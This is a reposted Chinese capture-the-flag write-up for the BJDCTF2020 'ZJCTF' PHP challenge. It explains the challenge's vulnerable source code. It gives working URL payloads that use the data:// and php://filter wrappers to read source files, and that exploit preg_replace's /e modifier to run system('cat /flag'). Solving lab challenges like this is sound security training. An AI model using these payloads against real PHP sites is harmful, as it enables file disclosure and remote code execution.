码迷,mamicode.com
首页 > 其他好文 > 详细

[BJDCTF2020]ZJCTF,不过如此

时间:2020-05-23 13:12:07      阅读:46      评论:0      收藏:0      [点我收藏+]

标签:session   lang   lan   repo   知识点   each   res   amp   complex   

知识点:
preg_replace()使用的/e模式可以存在远程执行代码
解析见链接:https://xz.aliyun.com/t/2557

看题目
首先是一段源代码:

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,‘r‘)==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,‘r‘)."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

text是PHP的DATA伪协议 file是PHP的filter伪协议
payload:

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

得到第二段源代码:

 
<?php
$id = $_GET[‘id‘];
$_SESSION[‘id‘] = $id;

function complex($re, $str) {
    return preg_replace(
        ‘/(‘ . $re . ‘)/ei‘,
        ‘strtolower("\\1")‘,
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET[‘cmd‘]);
}

payload如下:

next.php?\S*=${getflag()}&cmd=system(‘cat /flag‘);

[BJDCTF2020]ZJCTF,不过如此

标签:session   lang   lan   repo   知识点   each   res   amp   complex   

原文地址:https://www.cnblogs.com/buchuo/p/12941718.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!